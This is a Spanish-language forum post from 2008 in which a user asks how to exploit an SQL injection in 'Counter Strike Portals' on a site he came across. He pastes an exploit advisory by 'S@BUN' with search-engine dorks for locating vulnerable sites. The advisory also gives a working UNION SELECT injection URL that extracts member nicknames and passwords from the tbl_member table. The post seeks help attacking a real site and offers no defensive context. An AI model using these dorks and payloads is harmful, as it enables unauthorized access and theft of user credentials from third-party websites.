CS portals download sql injection[AYUDA]

Iniciado por LukitasZ, 26 Marzo 2008, 16:34 PM

0 Miembros y 1 Visitante están viendo este tema.

LukitasZ

Hola, estuve viendo en un sitio y me encontre con que contenia este bug "Counter Strike Portals download SQL Injection", estuve fijandome pero no encuentro la forma de explotarlo, encontre un exploit que andaba en la red pero no me termino de cerrar... espero a ver si alguno logra ayudarme gracias...
########################################################################
#

#

# COUNTER STRİque PORTALS(Kommentare zum Download)

#

########################################################################
#

#

# script download=http://www.phpwelt.de/scripte/Sonstiges/?PHPSESSID=3cfc7efaa4b2
a50e397b801526944fe6

#

# AUTHOR : S@BUN

#

#

#

# MAİL : hackturkiye.hackturkiye (at) gmail (dot) com [email concealed]

#

########################################################################
#

#

# DORK 1 : allinurl: id mode=details "index.php?page=downloads"

#

# DORK 2 : allinurl: index.php?page=news "mode=comment"

#

DORK 3 : "Kommentare zum Download"

########################################################################
#

EXPLOIT :

index.php?page=downloads&mode=details&id=-1/**/union/**/select/**/0,memb
er_nick,111,member_pass,222,333,444,555,666/**/from/**/tbl_member/*

########################################################################
#

# S@BUN i AM NOT HACKER S@BUN

########################################################################
#